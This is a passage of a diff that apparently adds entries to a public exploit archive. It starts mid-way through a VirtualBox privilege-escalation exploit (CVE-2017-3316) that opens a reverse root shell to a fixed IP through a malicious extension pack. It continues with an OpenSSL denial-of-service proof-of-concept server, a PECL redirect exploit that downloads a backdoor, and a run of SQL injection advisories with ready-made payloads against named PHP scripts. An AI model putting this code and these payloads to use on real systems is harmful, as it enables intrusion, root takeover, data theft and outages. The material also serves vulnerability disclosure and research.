+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.12.32.15\",5000));os.dup2(s.fileno(),0); +os.dup2(s.fileno(),1); +os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);",NULL); + return 0; +} + +The VirtualBox-Sources are downloaded next and the following code has +to be placed under src/VBox/ExtPacks/Evil/VBoxEvilMain.cpp: + +/* $Id: VBoxEvilMain.cpp $ */ +/** @file + * Evil main module. + */ + +/* + * Copyright (C) 2010-2016 Oracle Corporation + * + * Permission is hereby granted, free of charge, to any person + * obtaining a copy of this software and associated documentation + * files (the "Software"), to deal in the Software without + * restriction, including without limitation the rights to use, + * copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the + * Software is furnished to do so, subject to the following + * conditions: + * + * The above copyright notice and this permission notice shall be + * included in all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES + * OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT + * HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, + * WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR + * OTHER DEALINGS IN THE SOFTWARE. + */ + +#include + +#include +#include +#include +#include +#include +#include + + + +static PCVBOXEXTPACKHLP g_pHlp; + +static const VBOXEXTPACKREG g_vboxEvilExtPackReg = +{ + VBOXEXTPACKREG_VERSION, + /* .uVBoxFullVersion = */ VBOX_FULL_VERSION, + /* .pfnInstalled = */ NULL, + /* .pfnUninstall = */ NULL, + /* .pfnVirtualBoxReady =*/ NULL, + /* .pfnConsoleReady = */ NULL, + /* .pfnUnload = */ NULL, + /* .pfnVMCreated = */ NULL, + /* .pfnVMConfigureVMM = */ NULL, + /* .pfnVMPowerOn = */ NULL, + /* .pfnVMPowerOff = */ NULL, + /* .pfnQueryObject = */ NULL, + /* .pfnReserved1 = */ NULL, + /* .pfnReserved2 = */ NULL, + /* .pfnReserved3 = */ NULL, + /* .pfnReserved4 = */ NULL, + /* .pfnReserved5 = */ NULL, + /* .pfnReserved6 = */ NULL, + /* .u32Reserved7 = */ 0, + VBOXEXTPACKREG_VERSION +}; + +#include +/** @callback_method_impl{FNVBOXEXTPACKREGISTER} */ +extern "C" DECLEXPORT(int) VBoxExtPackRegister(PCVBOXEXTPACKHLP pHlp, +PCVBOXEXTPACKREG *ppReg, PRTERRINFO pErrInfo) +{ + + pid_t pid = fork(); + if(pid == 0) + { + +execl("/usr/lib/virtualbox/ExtensionPacks/Oracle_VM_VirtualBox_Extension_Pack/linux.amd64/evil","evil",NULL); + } + /* + * Check the VirtualBox version. + */ + if (!VBOXEXTPACK_IS_VER_COMPAT(pHlp->u32Version, +VBOXEXTPACKHLP_VERSION)) + return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH, + "Helper version mismatch - expected %#x got +%#x", + VBOXEXTPACKHLP_VERSION, pHlp->u32Version); + if ( VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion) != +VBOX_VERSION_MAJOR + || VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion) != +VBOX_VERSION_MINOR) + return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH, + "VirtualBox version mismatch - expected +%u.%u got %u.%u", + VBOX_VERSION_MAJOR, VBOX_VERSION_MINOR, + +VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion), + +VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion)); + + /* + * We're good, save input and return the registration structure. + */ + g_pHlp = pHlp; + *ppReg = &g_vboxEvilExtPackReg; + + return VINF_SUCCESS; +} + +After compiling, this Extension-Pack-Module is placed in the Archive +under linux.amd64/VBoxEvilMain.so. It's also necessary to modify the +ExtPack.xml so that the Evil-Module is used: + + + + Oracle VM VirtualBox Extension Pack + USB 2.0 and USB 3.0 Host Controller, Host Webcam, +VirtualBox RDP, PXE ROM, Disk Encryption. + 5.1.10 + VBoxEvilMain + VBoxVRDP + + + +Note: To make this Extension-Pack valid it is necessary to add all the +file-checksumms to ExtPack.manifest. The victim will be asked for the +root password during the update. If the attacker sends this malicious +Extension-Pack, a reverse root-shell will be executed. + +=== [ Timeline ] === + +This bug was reported in December. Oracle answered on the same day and +gave status reports regularly. They released a patch on January 17th. + +=== [ Credits ] === + +CVE-2017-3316 was discovered by Wolfgang Hotwagner +(https://tech.feedyourhead.at/content/privilege-escalation-in-virtualbox-cve-2017-3316) \ No newline at end of file diff --git a/platforms/multiple/dos/41192.c b/platforms/multiple/dos/41192.c new file mode 100755 index 000000000..a431918d4 --- /dev/null +++ b/platforms/multiple/dos/41192.c @@ -0,0 +1,212 @@ +// Source: https://guidovranken.wordpress.com/2017/01/26/cve-2017-3730-openssl-1-1-0-remote-client-denial-of-service-affects-servers-as-well-poc/ + +/* + * SSL server demonstration program + * + * Copyright (C) 2006-2015, ARM Limited, All Rights Reserved + * SPDX-License-Identifier: Apache-2.0 + * + * Licensed under the Apache License, Version 2.0 (the "License"); you may + * not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT + * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * This file is part of mbed TLS (https://tls.mbed.org) + */ + +/* Taken from mbed TLS programs/ssl/ssl_server.c and modified to crash postfix. + * Belongs to https://github.com/guidovranken/CVE-2017-3730 +*/ +#include +#include + +#include "mbedtls/entropy.h" +#include "mbedtls/ctr_drbg.h" +#include "mbedtls/certs.h" +#include "mbedtls/x509.h" +#include "mbedtls/ssl.h" +#include "mbedtls/net_sockets.h" +#include "mbedtls/error.h" +#include "mbedtls/debug.h" + +static int write_and_get_response( mbedtls_net_context *sock_fd, char *buf, size_t len ) +{ + int ret; + + if ( (ret = mbedtls_net_send( sock_fd, (unsigned char*)buf, strlen(buf) )) <= 0 ) + { + return -1; + } + + memset( buf, 0, len ); + ret = mbedtls_net_recv( sock_fd, (unsigned char*)buf, len ); + return ret; +} + +int main( void ) +{ + int ret; + mbedtls_net_context listen_fd, client_fd; + char buf[1024]; + const char *pers = "ssl_server"; + + int force_ciphersuite[2]; + mbedtls_entropy_context entropy; + mbedtls_ctr_drbg_context ctr_drbg; + mbedtls_ssl_context ssl; + mbedtls_ssl_config conf; + mbedtls_x509_crt srvcert; + mbedtls_pk_context pkey; + + mbedtls_net_init( &listen_fd ); + mbedtls_net_init( &client_fd ); + mbedtls_ssl_init( &ssl ); + mbedtls_ssl_config_init( &conf ); + mbedtls_x509_crt_init( &srvcert ); + mbedtls_pk_init( &pkey ); + mbedtls_entropy_init( &entropy ); + mbedtls_ctr_drbg_init( &ctr_drbg ); + + ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_srv_crt, + mbedtls_test_srv_crt_len ); + if( ret != 0 ) + { + goto exit; + } + + ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_cas_pem, + mbedtls_test_cas_pem_len ); + if( ret != 0 ) + { + goto exit; + } + + ret = mbedtls_pk_parse_key( &pkey, (const unsigned char *) mbedtls_test_srv_key, + mbedtls_test_srv_key_len, NULL, 0 ); + if( ret != 0 ) + { + goto exit; + } + + if( ( ret = mbedtls_net_bind( &listen_fd, NULL, "8888", MBEDTLS_NET_PROTO_TCP ) ) != 0 ) + { + goto exit; + } + + if( ( ret = mbedtls_ctr_drbg_seed( &ctr_drbg, mbedtls_entropy_func, &entropy, + (const unsigned char *) pers, + strlen( pers ) ) ) != 0 ) + { + goto exit; + } + + if( ( ret = mbedtls_ssl_config_defaults( &conf, + MBEDTLS_SSL_IS_SERVER, + MBEDTLS_SSL_TRANSPORT_STREAM, + MBEDTLS_SSL_PRESET_DEFAULT ) ) != 0 ) + { + goto exit; + } + + mbedtls_ssl_conf_rng( &conf, mbedtls_ctr_drbg_random, &ctr_drbg ); + + + mbedtls_ssl_conf_ca_chain( &conf, srvcert.next, NULL ); + if( ( ret = mbedtls_ssl_conf_own_cert( &conf, &srvcert, &pkey ) ) != 0 ) + { + goto exit; + } + + force_ciphersuite[0] = mbedtls_ssl_get_ciphersuite_id( "TLS-DHE-RSA-WITH-AES-256-GCM-SHA384" ); + force_ciphersuite[1] = 0; + mbedtls_ssl_conf_ciphersuites( &conf, force_ciphersuite ); + + if( ( ret = mbedtls_ssl_setup( &ssl, &conf ) ) != 0 ) + { + goto exit; + } + +reset: + + mbedtls_net_free( &client_fd ); + + mbedtls_ssl_session_reset( &ssl ); + + if( ( ret = mbedtls_net_accept( &listen_fd, &client_fd, + NULL, 0, NULL ) ) != 0 ) + { + goto exit; + } + + sprintf(buf, "220 ok\n"); + ret = write_and_get_response( &client_fd, buf, sizeof(buf)); + + if ( ret < 5 ) { + goto exit; + } + + if ( strncmp(buf, "EHLO ", 5) != 0 ) { + goto exit; + } + + sprintf(buf, "250-SIZE 157286400\n250-8BITMIME\n250-STARTTLS\n250-ENHANCEDSTATUSCODES\n250-PIPELINING\n250-CHUNKING\n250 SMTPUTF8\n"); + ret = write_and_get_response( &client_fd, buf, sizeof(buf)); + + if ( ret < 8 ) { + goto exit; + } + + if ( strncmp(buf, "STARTTLS", 8) != 0 ) { + goto exit; + } + sprintf(buf, "220 ok\n"); + ret = mbedtls_net_send( &client_fd, (unsigned char*)buf, strlen(buf) ); + if ( ret < 0 ) { + goto exit; + } + + mbedtls_ssl_set_bio( &ssl, &client_fd, mbedtls_net_send, mbedtls_net_recv, NULL ); + + + while( ( ret = mbedtls_ssl_handshake( &ssl ) ) != 0 ) + { + if( ret != MBEDTLS_ERR_SSL_WANT_READ && ret != MBEDTLS_ERR_SSL_WANT_WRITE ) + { + goto reset; + } + } + + while( ( ret = mbedtls_ssl_close_notify( &ssl ) ) < 0 ) + { + if( ret != MBEDTLS_ERR_SSL_WANT_READ && + ret != MBEDTLS_ERR_SSL_WANT_WRITE ) + { + goto reset; + } + } + + + ret = 0; + goto reset; + +exit: + + mbedtls_net_free( &client_fd ); + mbedtls_net_free( &listen_fd ); + + mbedtls_x509_crt_free( &srvcert ); + mbedtls_pk_free( &pkey ); + mbedtls_ssl_free( &ssl ); + mbedtls_ssl_config_free( &conf ); + mbedtls_ctr_drbg_free( &ctr_drbg ); + mbedtls_entropy_free( &entropy ); + + return( ret ); +} \ No newline at end of file diff --git a/platforms/php/webapps/41185.txt b/platforms/php/webapps/41185.txt new file mode 100755 index 000000000..c25131659 --- /dev/null +++ b/platforms/php/webapps/41185.txt @@ -0,0 +1,140 @@ +[+]############################################################################################# +[+] Credits / Discovery: John Page AKA hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/PEAR-ARBITRARY-FILE-DOWNLOAD.txt +[+] ISR: ApparitionSEC +[+]############################################################################################# + + + +Vendor: +============ +pear.php.net + + + +Product: +=================================== +PEAR Base System v1.10.1 +PEAR Installer's download utility + + + +Vulnerability Type: +======================= +Arbitrary File Download + + + +CVE Reference: +============== +CVE-2017-5630 + + + +Security Issue: +================ + +The download utility class in the Installer in PEAR Base System v1.10.1, does not validate file types and filenames after a redirect, +which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite. + +e.g. + +pecl download + +PEAR does not rename the arbitrary invalid file to the originally requested (safe) filename. +Therefore, attackers can overwrite files or download a backdoor if the PECL request is made from from web accesible directory etc.. + +Moreover, PECL doesn't delete these invalid files upon download, giving the attacker time to exploit it if attackers +can force the HTTP connection to stay open, and before a "invalid file message" is noticed. + +POC Video: +https://vimeo.com/201341280 + + +Proof of concept: +This POC involves 3 machines: +First machine is victim making a PECL download command request +Second is the vuln server receiving the file download request +Third is the malicious server hosting the PHP backdoor, .htaccess file etc. +=========================================================================== + +1) Victim machine attempts to download a legit ".tgz" archive. + +pecl download http://VULN-SERVER:8080/Test.tgz + + +2) VULN-SERVER where the victim is requesting "Test.tgz", and attacker controls HTTP response. + + +3) EVIL-SERVER where PECL follows and downloads 'unintended' Evil.php backdoor. +python -m SimpleHTTPServer 8888 + + +On VULN-SERVER run "PECL-File-Exploit.py" + +python PECL-File-Exploit.py + + +import socket + +HOST='localhost' +PORT=8080 +TARGET='http://EVIL-SERVER:8888/' +FILE='.htaccess' +s = socket.socket() +s.bind((HOST, PORT)) +s.listen(10) + +print 'Waiting for PECL connections...' + + +while True: + conn, addr = s.accept() + junk = conn.recv(512) + conn.send('HTTP/1.1 302 Found\r\n') + conn.send('Location: '+TARGET+FILE+'\r\n') + conn.close() +s.close() + + + +Then, make request for Test.tgz... + +C:\xampp\htdocs\webapp>pecl download http://VULN-SERVER:8080/Test.tgz + +downloading Evil.php ... +Starting to download Evil.php (4,665 bytes) +.....done: 4,665 bytes +File C:\xampp\htdocs\webapp\Evil.php downloaded + + + +Disclosure Timeline: +===================================== +Vendor Notification: January 11, 2017 +Informed "PECL package no longer maintained" : January 23, 2017 +Opened Bug #2117 : January 25, 2017 +January 29, 2017 : Public Disclosure + + + +Network Access: +================ +Remote + + + +Severity: +========= +High + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. \ No newline at end of file diff --git a/platforms/php/webapps/41186.txt b/platforms/php/webapps/41186.txt new file mode 100755 index 000000000..d62a5b0d8 --- /dev/null +++ b/platforms/php/webapps/41186.txt @@ -0,0 +1,23 @@ +Exploit Title: Caregiver Script v2.57 – SQL Injection +Date: 30.01.2017 +Vendor Homepage: http://itechscripts.com/ +Software Link: http://itechscripts.com/caregiver-script/ +Exploit Author: Kaan KAMIS +Contact: iletisim[at]k2an[dot]com +Website: http://k2an.com +Category: Web Application Exploits + +Overview + +Caregiver Script 2.51 is the best solution to launch a portal for hiring people for babysitting and other care giving services in a hassle free manner. + +Type of vulnerability: + +An SQL Injection vulnerability in Caregiver Script allows attackers to read +arbitrary administrator data from the database. + +Vulnerable Url: + +http://locahost/searchJob.php?sitterService=1[payload] +Vulnerable parameter : sitterService +Mehod : GET diff --git a/platforms/php/webapps/41187.txt b/platforms/php/webapps/41187.txt new file mode 100755 index 000000000..d46b2a686 --- /dev/null +++ b/platforms/php/webapps/41187.txt @@ -0,0 +1,30 @@ +Exploit Title: Itech Auction Script v6.49 – SQL Injection +Date: 30.01.2017 +Vendor Homepage: http://itechscripts.com/ +Software Link: http://itechscripts.com/auction-script/ +Exploit Author: Kaan KAMIS +Contact: iletisim[at]k2an[dot]com +Website: http://k2an.com +Category: Web Application Exploits + +Overview + +Auction Script v6.49 is the best standard auction product. This also comes pre-integrated with a robust Multi-Vendor interface and a powerful CMS panel. + +Type of vulnerability: + +An SQL Injection vulnerability in Itech Auction Script allows attackers to read +arbitrary data from the database. + +Vulnerability: + +URL : http://locahost/mcategory.php?mcid=4[payload] + +Parameter: mcid (GET) +Type: boolean-based blind +Title: AND boolean-based blind - WHERE or HAVING clause +Payload: mcid=4' AND 1734=1734 AND 'Ggks'='Ggks + +Type: UNION query +Title: Generic UNION query (NULL) - 1 column +Payload: mcid=-5980' UNION ALL SELECT CONCAT(0x71706b7171,0x764646494f4c7178786f706c4b4749517349686768525865666c6b6456434c766b73755a44657777,0x7171706a71)-- XAee diff --git a/platforms/php/webapps/41188.txt b/platforms/php/webapps/41188.txt new file mode 100755 index 000000000..94b5282e5 --- /dev/null +++ b/platforms/php/webapps/41188.txt @@ -0,0 +1,34 @@ +Exploit Title: Itech B2B Script v4.28 – SQL Injection +Date: 30.01.2017 +Vendor Homepage: http://itechscripts.com/ +Software Link: http://itechscripts.com/b2b-script/ +Exploit Author: Kaan KAMIS +Contact: iletisim[at]k2an[dot]com +Website: http://k2an.com +Category: Web Application Exploits + +Overview + +B2B Script v4.28 is a versatile web solution for the webmasters who are willing to launch their own B2B Portal within a few minutes. + +Type of vulnerability: + +An SQL Injection vulnerability in Itech B2B Script v4.28 allows attackers to read +arbitrary data from the database. + +Vulnerability: + +URL : catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7[payload] + +Parameter: #1* (URI) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' AND 6539=6539 AND 'Fakj'='Fakj + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' OR SLEEP(5) AND 'aEyV'='aEyV + + Type: UNION query + Title: Generic UNION query (NULL) - 6 columns + Payload: http://localhost/catcompany.php?token=-4421' UNION ALL SELECT NULL,CONCAT(0x71627a7071,0x596a5174756f74736847615667486444426f697a5549434943697a697064466865494a7156794770,0x716b707a71),NULL,NULL,NULL,NULL-- JwUA --- diff --git a/platforms/php/webapps/41189.txt b/platforms/php/webapps/41189.txt new file mode 100755 index 000000000..b1ee79b50 --- /dev/null +++ b/platforms/php/webapps/41189.txt @@ -0,0 +1,30 @@ +Exploit Title: Itech Classifieds Script v7.27 – SQL Injection +Date: 30.01.2017 +Vendor Homepage: http://itechscripts.com/ +Software Link: http://itechscripts.com/classifieds-script/ +Exploit Author: Kaan KAMIS +Contact: iletisim[at]k2an[dot]com +Website: http://k2an.com +Category: Web Application Exploits + +Overview + +Classifieds Script v7.27 is the best classifieds software. Try this script and present yourself with a robust digital platform. + +Type of vulnerability: + +An SQL Injection vulnerability in Classifieds Script v7.27 allows attackers to read +arbitrary data from the database. + +Vulnerability: + +URL : http://localhost/subpage.php?scat=51[payload] + +Parameter: scat (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: scat=51' AND 4941=4941 AND 'hoCP'='hoCP + + Type: UNION query + Title: Generic UNION query (NULL) - 26 columns + Payload: scat=51' UNION ALL SELECT CONCAT(0x7162787871,0x6d4d4d63544378716c72467441784342664b4a6f424d615951594f476c53465070635545505a7558,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SKES diff --git a/platforms/php/webapps/41190.txt b/platforms/php/webapps/41190.txt new file mode 100755 index 000000000..c4d21cde2 --- /dev/null +++ b/platforms/php/webapps/41190.txt @@ -0,0 +1,26 @@ +Exploit Title: Itech Dating Script v3.26 – SQL Injection +Date: 30.01.2017 +Vendor Homepage: http://itechscripts.com/ +Software Link: http://itechscripts.com/dating-script/ +Exploit Author: Kaan KAMIS +Contact: iletisim[at]k2an[dot]com +Website: http://k2an.com +Category: Web Application Exploits + +Overview + +Itech Dating Script v3.26 is a powerful platform to launch a dating portal. This product is extremely popular among the new webmasters. + +Type of vulnerability: + +An SQL Injection vulnerability in Itech Dating Script v3.26 allows attackers to read +arbitrary data from the database. + +Vulnerability: + +URL : http://localhost/see_more_details.php?id=40[payload] + +Parameter: id (GET) +Type: UNION query +Title: Generic UNION query (NULL) - 29 columns +Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs diff --git a/platforms/php/webapps/41191.txt b/platforms/php/webapps/41191.txt new file mode 100755 index 000000000..74f7c94d0 --- /dev/null +++ b/platforms/php/webapps/41191.txt @@ -0,0 +1,26 @@ +Exploit Title: Itech Freelancer Script v5.13 – SQL Injection +Date: 30.01.2017 +Vendor Homepage: http://itechscripts.com/ +Software Link: http://itechscripts.com/freelancer-script/ +Exploit Author: Kaan KAMIS +Contact: iletisim[at]k2an[dot]com +Website: http://k2an.com +Category: Web Application Exploits + +Overview + +Itech Freelancer Script v5.13 is the best reverse auction script available online. Just install the product to launch your website within minutes. Please try the product now. + +Type of vulnerability: + +An SQL Injection vulnerability in Itech Freelancer Script v5.13 allows attackers to read +arbitrary data from the database. + +Vulnerability: + +URL : http://localhost/category.php?sk=4[payload] + +Parameter: sk (GET) +Type: UNION query +Title: Generic UNION query (NULL) - 52 columns +Payload: sk=1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162787871,0x4c4d424a4d6549554b5878684e494a4464767161454a6d757a47454c697a4e4470544c46426e4765,0x71716b7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rbbL diff --git a/platforms/php/webapps/41193.txt b/platforms/php/webapps/41193.txt new file mode 100755 index 000000000..f4c1a2bbe --- /dev/null +++ b/platforms/php/webapps/41193.txt @@ -0,0 +1,35 @@ +Exploit Title: Itech Multi Vendor Script 6.49 – SQL Injection +Date: 30.01.2017 +Vendor Homepage: http://itechscripts.com/ +Software Link: http://itechscripts.com/multi-vendor-shopping-script/ +Exploit Author: Kaan KAMIS +Contact: iletisim[at]k2an[dot]com +Website: http://k2an.com +Category: Web Application Exploits + +Overview + +Multi Vendor Script v6.49 offers a robust eCommerce platform. The script has been designed to deliver all major features required to run an eCommerce website. + +Type of vulnerability: + +An SQL Injection vulnerability in Itech Multi Vendor Script 6.49 allows attackers to read +arbitrary data from the database. + +Vulnerability: + +http://localhost/multi-vendor-shopping-script/product-list.php?pl=[payload] + +Parameter: #1* (URI) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=11201ff1de774005f8da13f42943881c655f' RLIKE (SELECT (CASE WHEN (6851=6851) THEN 0x313132303166663164653737343030356638646131336634323934333838316336353566 ELSE 0x28 END))-- HnQm + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=11201ff1de774005f8da13f42943881c655f' AND SLEEP(5)-- WHze + + Type: UNION query + Title: MySQL UNION query (NULL) - 5 columns + Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=-3569' UNION ALL SELECT CONCAT(0x716b6a7871,0x7573485a716b767347544870695571415a465846434b5541777566416a6571656d6a5a6c62526f47,0x7170627171),NULL,NULL,NULL,NULL# +--- diff --git a/platforms/php/webapps/41194.txt b/platforms/php/webapps/41194.txt new file mode 100755 index 000000000..79e958c12 --- /dev/null +++ b/platforms/php/webapps/41194.txt @@ -0,0 +1,34 @@ +Exploit Title: Itech News Portal Script v6.28 – SQL Injection +Date: 30.01.2017 +Vendor Homepage: http://itechscripts.com/ +Software Link: http://itechscripts.com/news-portal-script/ +Exploit Author: Kaan KAMIS +Contact: iletisim[at]k2an[dot]com +Website: http://k2an.com +Category: Web Application Exploits + +Overview + +News Portal Script v6.28 is a CMS Software developed as a news broadcasting portal. This product is considered as the best in this category. + +Type of vulnerability: + +An SQL Injection vulnerability in News Portal Script v6.28 allows attackers to read +arbitrary data from the database. + +Vulnerability: + +http://localhost/news-portal-script/information.php?inf=22[payload] + +Parameter: inf (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: inf=22 AND 3993=3993 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: inf=22 OR SLEEP(5) + + Type: UNION query + Title: Generic UNION query (NULL) - 14 columns + Payload: inf=-1695 UNION ALL SELECT CONCAT(0x716a787171,0x7356527144546c6e6b47714b49415759595952764c734a657165476f4d496e534e565668666f786f,0x7178787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- trhS diff --git a/platforms/php/webapps/41195.txt b/platforms/php/webapps/41195.txt new file mode 100755 index 000000000..c007ef93a --- /dev/null +++ b/platforms/php/webapps/41195.txt @@ -0,0 +1,34 @@ +Exploit Title: Itech Real Estate Script v3.12 – SQL Injection +Date: 30.01.2017 +Vendor Homepage: http://itechscripts.com/ +Software Link: http://itechscripts.com/real-estate-script/ +Exploit Author: Kaan KAMIS +Contact: iletisim[at]k2an[dot]com +Website: http://k2an.com +Category: Web Application Exploits + +Overview + +Itech Real Estate Script v3.12 is a robust platform for launching real-estate portals. This script is currently available under a special pricing of US$199. + +Type of vulnerability: + +An SQL Injection vulnerability in Itech Real Estate Script v3.12 allows attackers to read +arbitrary data from the database. + +Vulnerability: + +http://localhost/real-estate-script/search_property.php?property_for=1[payload] + +Parameter: property_for (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: property_for=1 AND 4574=4574 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: property_for=1 AND SLEEP(5) + + Type: UNION query + Title: Generic UNION query (NULL) - 8 columns + Payload: property_for=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176707a71,0x65546e587a4d65446c625876704b7a784d6651575074684f516f43486d716f5844664870577a6d43,0x7178626b71)-- zLWo diff --git a/platforms/php/webapps/41197.txt b/platforms/php/webapps/41197.txt new file mode 100755 index 000000000..82bc35b81 --- /dev/null +++ b/platforms/php/webapps/41197.txt @@ -0,0 +1,35 @@ +# # # # # +# Exploit Title: PHP Product Designer Script - Arbitrary File Upload +# Google Dork: N/A +# Date: 30.01.2017 +# Vendor Homepage: https://codecanyon.net/item/php-product-designer/19334412 +# Software Buy: https://codecanyon.net/item/php-product-designer/19334412 +# Demo: http://phpproductdesigner.000webhostapp.com/products.php +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# Exploit : +# http://localhost/[PATH]/products.php / Create New Design +# http://localhost/[PATH]/theme/images/uploads/[......PHP] +# # # # # +# uploadImage.php + +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41198.txt b/platforms/php/webapps/41198.txt new file mode 100755 index 000000000..92f848f44 --- /dev/null +++ b/platforms/php/webapps/41198.txt @@ -0,0 +1,35 @@ +# # # # # +# Exploit Title: PHP Logo Designer Script - Arbitrary File Upload +# Google Dork: N/A +# Date: 30.01.2017 +# Vendor Homepage: https://codecanyon.net/item/php-logo-designer/19362231 +# Software Buy: https://codecanyon.net/item/php-logo-designer/19362231 +# Demo: http://phplogodesigner.000webhostapp.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# Exploit : +# http://localhost/[PATH]/designer.php +# http://localhost/[PATH]/theme/images/uploads/[......PHP] +# # # # # +# uploadImage.php + +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41199.txt b/platforms/php/webapps/41199.txt new file mode 100755 index 000000000..5795626b6 --- /dev/null +++ b/platforms/php/webapps/41199.txt @@ -0,0 +1,38 @@ +Exploit Title: Video Sharing Script 4.94 – SQL Injection +Date: 30.01.2017 +Vendor Homepage: http://itechscripts.com/ +Software Link: http://itechscripts.com/video-sharing-script/ +Exploit Author: Kaan KAMIS +Contact: iletisim[at]k2an[dot]com +Website: http://k2an.com +Category: Web Application Exploits + +Overview + +Video Sharing Script v4.94 is the best audio/ video sharing portal. You can easily deploy the software and launch your own video sharing portal in moments. + +Type of vulnerability: + +An SQL Injection vulnerability in Video Sharing Script 4.94 allows attackers to read +arbitrary data from the database. + +Vulnerability: + +http://localhost/video-sharing-script/watch-video.php?v=67d8ab[payload] + +Parameter: #1* (URI) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' RLIKE (SELECT (CASE WHEN (1170=1170) THEN 0x363764386162 ELSE 0x28 END))-- Niby + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND (SELECT 2680 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(2680=2680,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Wovm + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND SLEEP(5)-- pcjq + + Type: UNION query + Title: MySQL UNION query (NULL) - 26 columns + Payload: 